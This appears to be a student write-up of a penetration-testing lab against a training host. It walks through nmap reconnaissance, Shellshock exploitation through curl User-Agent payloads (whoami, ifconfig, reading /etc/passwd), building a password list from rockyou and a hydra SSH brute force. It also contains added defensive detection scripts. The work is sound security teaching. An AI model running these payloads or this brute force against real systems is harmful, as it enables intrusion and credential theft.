Activity 4.1: Exploiting Cupcake

Part 1: Active Recon

The target is cupcake.shire.org at 10.0.5.23.

  • Make sure to check the top 100 TCP ports to see what ports are listening

For those ports that are open, run another scan that attempts to run version detection against the service port.

  • sudo nmap -sV -p 80 10.0.5.23

Deliverable 1. Provide a screenshot of your team's version detection scan(s).

Deliverable 2. Examine any applications that are publicly accessible. Report on what you find.

  • The original scan only came up with http, but in the scan below using -A we found that 22/tcp OpenSSH 5.3 was also publicly accessible.

Deliverable 3. You should have the versions of at least two applications. Go ahead and hit the internet and see if your group can find:

  1. Related operating system (this is easy): Linux (CentOS)

  2. Release (a bit harder): Apache 2.2.15

When running -A, we were able to find OpenSSH (22) and port 80 as open.

Part 2 - Dealing with Targets and Scans

Install nmaptocsv

  • sudo apt update

  • sudo apt install python3-pip

  • sudo pip install nmaptocsv

Organize the results of your scans

  • TARGET=10.0.5.23; sudo nmap -sT -sV --top-ports=100 $TARGET -Pn -oG top100.txt

  • Run cat top100.txt to see the output of the command in the file

  • Organize the results of your scans: nmaptocsv -i top100.txt -d "."

    • This will organize the results into CSV format

  • Copy and paste the results into a spreadsheet, and they will be formatted nicely!
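As an added example (not part of the lab and not nmaptocsv's own code), the same conversion done by hand in Python: parse the grepable (-oG) output that the top-100 scan writes into rows, keep the open ports, and render them as CSV ready to paste into a spreadsheet. The scan text below is a constructed sample modelled on cupcake; the version strings in it are assumptions, not the page's results.

```python
import csv
import io
import re

# Constructed sample of nmap -oG output, modelled on the lab's top-100 scan of
# cupcake; the version strings are assumptions, not the page's own results.
SAMPLE_OG = """# Nmap 7.80 scan initiated (constructed sample)
Host: 10.0.5.23 ()\tStatus: Up
Host: 10.0.5.23 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/, 443/closed/tcp//https///\tIgnored State: closed (97)
# Nmap done (constructed sample)
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")
COLUMNS = ["ip", "hostname", "port", "proto", "state", "service", "version"]


def parse_grepable(text):
    """Return one dict per port entry found in nmap grepable output."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip, hostname = HOST_RE.match(line).groups()
        # Fields are tab-separated "Name: value" pairs; port entries are ", "-separated
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        for entry in fields["Ports"].split(", "):
            # Each entry is port/state/proto/owner/service/rpc/version/
            parts = entry.split("/")
            if len(parts) < 7:
                continue
            rows.append({"ip": ip, "hostname": hostname, "port": int(parts[0]),
                         "proto": parts[2], "state": parts[1],
                         "service": parts[4], "version": parts[6]})
    return rows


def open_ports(rows):
    return [r for r in rows if r["state"] == "open"]


def to_csv(rows):
    """Render rows as CSV text ready to paste into a spreadsheet."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=COLUMNS, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    print(to_csv(open_ports(parse_grepable(SAMPLE_OG))))
```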

Deliverable 4. Provide a screenshot similar to the one below that shows your exported Google Sheet of nmap scan data against cupcake.

Pasted output of the scan into Google Sheets

Part 3: Vulnerability Detection

  • Apache 2.1.15 Vulnerabilities

  • OpenSSH 5.3 Vulnerabilities

Deliverable 5. What potential remote vulnerabilities did your team find?

Part 4 - Remote Code Execution Vulnerability

Testing the Vulnerability

Just because your research indicated the potential of a vulnerability, let's see if we can confirm it, both by hand and by use of an nmap script.

Deliverable 6. Using the following screenshot as a point of departure, determine the target's running kernel version (you would use the uname command for this). Provide a screenshot that shows the major and minor release of the kernel.

  • Kernel is 2.6.32-431.el6.x86_64

Shows the kernel version

Deliverable 7. The following technique exposes the OS release. Show similar screenshots that show:

Example from the deliverable showing the command that exposes the OS release

/usr/bin/whoami

  • curl -H 'User-Agent: () { :; }; echo ; /usr/bin/whoami' http://10.0.5.23/cgi-bin/status

  • The command above gets a command executed by a CGI script that is vulnerable to Shellshock.

  • curl transfers data from or to a server using protocols like HTTP/HTTPS

  • -H 'User-Agent: () { :; }; echo ; /usr/bin/whoami'

    • -H adds an HTTP header to the request

    • 'User-Agent: sets the User-Agent HTTP header (which identifies the client making the request)

    • () { :; }; the malicious part of the command that exploits the Shellshock vulnerability

    • echo ; /usr/bin/whoami is the part of the payload the attacker controls. The echo only emits a blank line (which ends the HTTP headers), and the command that follows, in this case whoami, is what gets executed and whose output comes back

whoami

/sbin/ifconfig

  • curl -H 'User-Agent: () { :; }; echo ; /sbin/ifconfig' http://10.0.5.23/cgi-bin/status

    • ifconfig has a different path than cat, so we have to use /sbin/ifconfig

Results of running ifconfig

Code behind the status CGI

  • curl -H 'User-Agent: () { :; }; echo ; /bin/cat *' http://10.0.5.23/cgi-bin/status

    • Here we are using a wildcard * to read all the files in the directory containing cgi-bin/status

    • This works since there is only one file there: the wildcard would read every file in the directory, but it just reads the one file we are targeting, cgi-bin/status

The code behind the status CGI

Contents of /etc/passwd

  • curl -H 'User-Agent: () { :; }; echo ; /bin/cat /etc/passwd' http://10.0.5.23/cgi-bin/status

    • You need two parts here since you want to cat the contents of /etc/passwd:

    • /bin/cat and /etc/passwd

/etc/passwd
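From the defender's side of the requests above, here is an added example (not part of the lab) of how the same traffic looks in the web server's log and how to pick it out: Apache's combined log format records the User-Agent and Referer of every request, and a header value beginning with the "() {" function-definition prefix is the Shellshock signature whatever command follows it. The log lines are constructed samples, not taken from cupcake.

```python
import re

# Constructed Apache "combined" access-log lines (not from the lab's server):
# one ordinary request, then two Shellshock-style requests aimed at the status
# CGI, one carrying the payload in User-Agent and one in Referer.
SAMPLE_LOG = """\
10.0.5.50 - - [06/Oct/2023:14:02:11 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.5.50 - - [06/Oct/2023:14:03:27 -0400] "GET /cgi-bin/status HTTP/1.1" 200 87 "-" "() { :; }; echo ; /usr/bin/whoami"
10.0.5.51 - - [06/Oct/2023:14:04:02 -0400] "GET /cgi-bin/status HTTP/1.1" 200 1320 "() { :;}; /bin/cat /etc/passwd" "curl/7.68.0"
"""

# host ident user [time] "method path protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Vulnerable bash treats an environment value beginning with "() {" as a
# function definition and runs whatever follows the closing brace, so the
# "() {" prefix is the signature worth alerting on regardless of the command.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def is_shellshock_value(value):
    """True if a header value starts with the Shellshock function-definition prefix."""
    return SHELLSHOCK_RE.match(value.lstrip()) is not None


def find_shellshock_probes(log_text):
    """One finding per request whose User-Agent or Referer carries the prefix;
    the cgi flag marks requests under /cgi-bin/, where Apache hands headers to
    the script as environment variables."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for field, header in (("ua", "User-Agent"), ("referer", "Referer")):
            value = m.group(field)
            if is_shellshock_value(value):
                findings.append({"ip": m.group("ip"), "path": m.group("path"),
                                 "header": header, "payload": value,
                                 "status": int(m.group("status")),
                                 "cgi": m.group("path").startswith("/cgi-bin/")})
    return findings


if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(hit)
```

A 200 status on such a request is the point to escalate: the script answered normally, which is consistent with the injected command having run.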

Part 5: The foothold

There is a list of the most common passwords on Kali in the file /usr/share/wordlists/rockyou.txt.gz

  • Unzip the file and output the contents into a text file

    • zcat /usr/share/wordlists/rockyou.txt.gz > CommonPasswords.txt

Most common password list, unzipped with zcat

We have the username samwise and we are assuming that the username is part of the password.

  • cat CommonPasswords.txt | grep samwise -i

Deliverable 8. Armed with the contents of /etc/passwd, let's see if we can build a list of likely passwords for the target account. You should end up with 28 passwords in your list. Provide a screenshot that shows how you generated the list as well as the list contents.

Grepping the password list

  • Put the grepped passwords into a file

    • cat CommonPasswords.txt | grep samwise > samwise_passwords.txt

Saving the passwords into a file

Use Hydra to Crack the Password!

Deliverable 9. Show a screenshot of your hydra session as well as an SSH login session using the targeted account. Also dump the contents of user-flag.txt using cat or more.

  • sudo hydra -l samwise -P samwise_passwords2.txt 10.0.5.23 -t 4 ssh

Password for Samwise with Hydra

SSH to Cupcake with the username

Successful SSH into Cupcake with samwise@10.0.5.23

Cat the User Flag file
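On the target side, a hydra run like the one above leaves a burst of "Failed password" lines in sshd's log (/var/log/secure on a CentOS 6 host such as cupcake), followed by an "Accepted password" line once the guess lands. As an added example (not part of the lab), this Python detector groups failures per source address inside a time window and notes whether the same address then logged in successfully. The log lines are constructed samples, not taken from the target.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in the /var/log/secure format of a CentOS 6 host like
# cupcake (not taken from the target): a short parallel guessing burst from one
# address, then a successful login from the same address.
SAMPLE_SECURE = """\
Oct  6 14:10:01 cupcake sshd[2311]: Failed password for samwise from 10.0.5.50 port 51234 ssh2
Oct  6 14:10:01 cupcake sshd[2312]: Failed password for samwise from 10.0.5.50 port 51235 ssh2
Oct  6 14:10:02 cupcake sshd[2313]: Failed password for invalid user admin from 10.0.5.50 port 51236 ssh2
Oct  6 14:10:03 cupcake sshd[2314]: Failed password for samwise from 10.0.5.50 port 51238 ssh2
Oct  6 14:10:04 cupcake sshd[2315]: Accepted password for samwise from 10.0.5.50 port 51240 ssh2
Oct  6 15:30:00 cupcake sshd[2400]: Failed password for samwise from 10.0.5.60 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_sshd(text):
    """Return (timestamp, result, user, source_ip) for each password-auth line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # syslog timestamps carry no year; only deltas within one log matter here
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            events.append((ts, m.group("result"), m.group("user"), m.group("ip")))
    return events


def detect_bruteforce(text, threshold=4, window_s=60):
    """Alert on source IPs with >= threshold failures inside window_s seconds and
    note whether the same IP then logged in successfully (the foothold)."""
    failures = defaultdict(list)   # ip -> timestamps of recent failures
    alerts = {}
    for ts, result, user, ip in parse_sshd(text):
        if result == "Failed":
            recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_s]
            recent.append(ts)
            failures[ip] = recent
            if len(recent) >= threshold:
                alert = alerts.setdefault(ip, {"first_seen": recent[0], "accepted_after": None})
                alert["failures"] = len(recent)
        elif ip in alerts and alerts[ip]["accepted_after"] is None:
            alerts[ip]["accepted_after"] = user
    return alerts
```

A low threshold with a short window matches hydra's -t 4 style of a few parallel connections per second; the single failure from the second address stays below it.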
